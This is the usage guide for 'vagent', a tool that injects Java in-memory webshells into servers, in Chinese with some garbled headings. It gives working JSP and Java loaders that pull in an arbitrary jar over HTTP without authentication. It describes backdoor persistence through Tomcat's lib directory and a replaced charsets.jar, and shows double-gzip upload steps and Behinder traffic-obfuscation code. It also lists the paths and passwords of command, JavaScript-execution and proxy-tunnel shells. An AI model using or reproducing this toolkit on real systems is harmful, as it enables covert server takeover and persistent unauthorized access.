
多功能 java agent 内存马

vagent鍐呭瓨椹敞鍏ュ伐鍏?/h1>

使用说明：

vagent有四种使用方式

1.命令行方式加载

# Run the injector directly on the target host. According to the note that
# follows, it then attaches to every Java process it can find, so it
# presumably has to run as a user that is allowed to attach to those JVMs.
java -jar vagent.jar

会自动注入内存马到所有java起的服务内

2.Tomcat lib 后门加载

将 vagent.jar 放在 Tomcat 目录下的lib目录就可以了，名字可以随意更改，Tomcat重启后会自动注入内存马

3.jdk/jre Spring后门加载

将 vagent.jar 更名为 charsets.jar 放至 JAVA_HOME/jre/lib/ 目录下，替换原有的charsets.jar文件，Spring重启时会自动注入内存马

根据业务情况，有概率无需重启，发送下面的包就可以注入内存马（原理应是请求头中的 charset=GBK 触发 JVM 懒加载 charsets.jar 中的扩展字符集，从而加载被替换的 jar）

GET / HTTP/1.1
Accept: text/html;charset=GBK

4. JSP/java代码/命令写入文件 加载

1.JAVA代码方式

需要先上传vagent.jar到目标服务器中

再运行下面的代码注入内存马

// Loader stage, plain-Java variant. FilePath is a placeholder for the absolute
// path of the uploaded vagent.jar. The jar is loaded in a throw-away
// URLClassLoader (no explicit parent -> system class loader is the parent) and
// the static method org.apache.catalina.servlets.Attach.att(String) is invoked.
// Nothing verifies what the jar is, so the same two lines will load any jar that
// exposes that class and method.
java.net.URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(FilePath).toURI().toURL()});
// The String argument is the literal "ignored"; whether att() reads it is not visible here.
cl.loadClass("org.apache.catalina.servlets.Attach").getMethod("att", String.class).invoke(null,"ignored");
2.JSP方式
<%-- Stage-1 loader for vagent (JSP variant, raw gzip request body).
     The POST body is expected to be a gzip stream containing vagent.jar. It is
     written to a randomly named file under java.io.tmpdir, loaded with a fresh
     URLClassLoader, and the static method Attach.att(String) is invoked.
     There is no authentication, no size limit and no check on the jar's
     contents: anyone who can POST to this page can make the JVM load a jar of
     their choosing. For responders: the dropped jar is never deleted, so look
     for numeric-named files in the JVM's java.io.tmpdir and for
     org.apache.catalina.servlets.Attach in loaded-class listings. --%>
<%
    try {
        // Random numeric file name in the JVM temp dir; Math.random() is not a
        // secure source, but here it only needs to avoid collisions.
        String f = System.getProperty("java.io.tmpdir") + "/" + Math.random();
        // Exactly one gzip layer is removed here. The notes say the upload is
        // gzipped twice, so the other layer is presumably undone before the body
        // reaches this page - TODO confirm against the transport used.
        java.io.InputStream g = new java.util.zip.GZIPInputStream(request.getInputStream());
        java.io.FileOutputStream o = new java.io.FileOutputStream(f);
        // Copy loop. Both streams are closed only on the success path; an
        // exception mid-copy leaves 'o' open until GC.
        byte[] t = new byte[1024];int n;while((n = g.read(t)) != -1) {o.write(t, 0, n);}g.close();o.close();
        // No explicit parent -> the system class loader is the parent.
        java.net.URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.io.File(f).toURI().toURL()});
        // The String argument is the literal "ignored"; whether att() reads it is not visible here.
        cl.loadClass("org.apache.catalina.servlets.Attach").getMethod("att", String.class).invoke(null,"ignored");
    } catch (Exception e) {
        // Failure text (e.g. "Not in GZIP format", ClassNotFoundException) is
        // echoed straight into the HTTP response.
        out.println(e.getMessage());
    }
%>

然后用 postman 发送 gzip 压缩两次（注意是两次）后的 vagent.jar 大马文件（用 burp 的 paste from file 会出问题）

base64方式

<%-- Stage-1 loader for vagent (JSP variant, base64 request parameter).
     The jar arrives gzip-compressed and base64-encoded in request parameter
     "c". It is decoded, written to a randomly named file under java.io.tmpdir,
     loaded with a fresh URLClassLoader and Attach.att(String) is invoked.
     As with the raw-gzip variant there is no authentication and the dropped
     file is never removed. --%>
<%
    try {
        String f = System.getProperty("java.io.tmpdir") + "/" + Math.random();
        // Payload is read from parameter "c" (query string or form body).
        String b = request.getParameter("c");
        Class base64;
        byte[] value = null;
        try {
            // Java 8+: java.util.Base64, resolved reflectively so the page still
            // compiles on older JDKs that lack the class.
            base64 =Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
            value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { b });
        }catch (Exception e){
            // Pre-8 fallback: sun.misc.BASE64Decoder. The stack trace of the failed
            // java.util.Base64 attempt is printed to server stderr even when this
            // fallback succeeds.
            base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance();
            value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { b });
            e.printStackTrace();
        }
        // One gzip layer is removed here; the notes say the jar is gzipped
        // twice, so the other layer is presumably handled elsewhere - TODO confirm.
        java.io.InputStream d = new java.io.ByteArrayInputStream(value);
        java.io.InputStream g = new java.util.zip.GZIPInputStream(d);
        java.io.FileOutputStream o = new java.io.FileOutputStream(f);
        // Streams are closed only on the success path.
        byte[] t = new byte[1024];int n;while((n = g.read(t)) != -1) {o.write(t, 0, n);}g.close();o.close();
        // Unlike the raw-gzip variant, the JSP's own class loader is the parent
        // here, so container classes are visible to the loaded jar.
        java.net.URLClassLoader cl = new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL("file:///"+f)}, getClass().getClassLoader());
        cl.loadClass("org.apache.catalina.servlets.Attach").getMethod("att", String.class).invoke(null,"ignored");
    }catch (Exception e){
        // Errors go to the server's stderr (e.g. catalina.out), not to the response.
        e.printStackTrace();
    }
%>
//gzip 鍘嬬缉涓ゆ锛?
# Build the double-gzipped upload referred to above; work on a copy so
# vagent.jar itself stays intact.
cp vagent.jar x
# First pass: gzip replaces x with x.gz
gzip x
# Drop the suffix so gzip will compress the already-compressed data again
mv x.gz x
# Second pass: the file to upload is the resulting x.gz. The JSP loaders above
# strip only one gzip layer, so the other is presumably removed in transit -
# TODO confirm.
gzip x
3.利用命令写文件，使用vagent-mini先注入小马：

在遇到只有命令执行来写入文件的情况，可以先写入一个vagent-mini.jar小马

鐒跺悗杩愯 java -jar vagent-mini.jar 娉ㄥ叆灏忛┈

vagent-mini小马依赖于jdk环境，如果目标只有jre环境可能会注入失败，vagent大马则jre和jdk环境都通用

链接：以/faviconmini 结尾

//gzip 鍘嬬缉涓ゆ锛?
# Same double-gzip preparation as above, for the /faviconmini upload path.
cp vagent.jar x
# First pass: gzip replaces x with x.gz
gzip x
# Drop the suffix so the second pass compresses the compressed data again
mv x.gz x
# Second pass: upload the resulting x.gz
gzip x

然后用 postman 把 gzip 压缩两次（注意是两次）后的 vagent.jar 大马文件发送到链接路径注入大马（用 burp 的 paste from file 会出问题）

注入的内存马：

1.冰蝎

链接：以 /faviconb 结尾

密码：自定义加解密协议（见下面的 Encrypt/Decrypt：每字节 +1、gzip、再每字节 +1，没有密钥也没有完整性校验，属于混淆而非加密，流量可被直接识别和还原）

/**
 * Obfuscates a payload for the Behinder ("冰蝎") channel: every byte is shifted up
 * by one, the result is gzip-compressed, and every compressed byte is shifted up
 * by one again. This is not encryption - there is no key and no integrity check -
 * it only defeats naive signature matching on the wire.
 *
 * @param data plaintext bytes
 * @return the obfuscated bytes, or {@code data} itself unchanged if compression fails
 */
private byte[] Encrypt(byte[] data) {
    int len = data.length;
    byte[] shifted = new byte[len];
    for (int idx = 0; idx < len; idx++) {
        shifted[idx] = (byte) (data[idx] + 1);
    }
    java.io.ByteArrayOutputStream sink = new java.io.ByteArrayOutputStream();
    try {
        java.util.zip.GZIPOutputStream gz = new java.util.zip.GZIPOutputStream(sink);
        gz.write(shifted);
        gz.close();
    } catch (Exception ignored) {
        // Historical behaviour: silently fall back to the plaintext.
        return data;
    }
    // Second shift is applied in place on the compressed bytes.
    byte[] packed = sink.toByteArray();
    for (int idx = 0; idx < packed.length; idx++) {
        packed[idx] = (byte) (packed[idx] + 1);
    }
    return packed;
}


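/**
 * Inverse of Encrypt(): shift every byte down by one, gunzip, shift down again.
 * Like Encrypt() this is obfuscation, not cryptography - no key, no integrity
 * check - so anyone with this page can decode the traffic.
 *
 * @param data the obfuscated payload as produced by Encrypt()
 * @return the recovered bytes; on any failure (e.g. the input is not valid gzip
 *         after the first shift) the ORIGINAL input is returned unchanged, which
 *         is the historical behaviour callers rely on
 */
private byte[] Decrypt(byte[] data) {
    byte[] dt = new byte[data.length];
    for (int i = 0; i < data.length; i++) {
        dt[i] = (byte) (data[i] - 1);
    }
    java.util.zip.GZIPInputStream i = null;
    try {
        java.io.ByteArrayInputStream t = new java.io.ByteArrayInputStream(dt);
        // Buffer size = input length, as before (0 throws and falls through to the fallback).
        i = new java.util.zip.GZIPInputStream(t, dt.length);
        byte[] c = r(i);
        byte[] ct = new byte[c.length];
        for (int b = 0; b < c.length; b++) {
            ct[b] = (byte) (c[b] - 1);
        }
        return ct;
    } catch (Exception ignored) {
        // Deliberate best-effort fallback: callers expect the raw input back.
    } finally {
        // Fix: the original never closed the stream, leaking the Inflater's
        // native buffer until GC on every call.
        if (i != null) {
            try {
                i.close();
            } catch (java.io.IOException ignored) {
                // nothing useful to do on close failure
            }
        }
    }
    return data;
}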
/**
 * Drains an InputStream into a byte array in 1 KiB chunks.
 * Read errors are swallowed: whatever was read before the failure is returned,
 * so a truncated gzip stream yields a partial result rather than an exception.
 * The stream is not closed here; that is the caller's job.
 *
 * @param i stream to drain
 * @return all bytes read up to EOF or the first read error
 */
private byte[] r(java.io.InputStream i) {
    java.io.ByteArrayOutputStream collected = new java.io.ByteArrayOutputStream();
    byte[] chunk = new byte[1024];
    try {
        for (int got = i.read(chunk); got != -1; got = i.read(chunk)) {
            collected.write(chunk, 0, got);
        }
    } catch (Exception ignored) {
        // Best-effort: stop copying and hand back what we have.
    }
    return collected.toByteArray();
}

2.CMD马

链接：以 /faviconc 结尾

POST涓ゆBase64浠ュ悗鐨勫懡浠?/p>

3.JS浠g爜鎵ц椹?/h4>

链接：以 /faviconjs 结尾

POST涓ゆBase64浠ュ悗鐨刯s浠g爜

也可以使用蚁剑连接，密码是a

4.Neo代理内存马

链接：以 /faviconneo 结尾

密码：page，要加 --skip

# -k page is the key noted above; the note also says --skip is required
# (reason not stated here). -p 1083 is presumably the local listening port.
python3 neoreg.py -k page -u URL -p 1083 --skip

5.Suo5代理内存马

链接：以 /faviconsuo 结尾

无需密码

6.WebSocket代理内存马

链接：以 /faviconws 结尾

无需密码，使用gost进行连接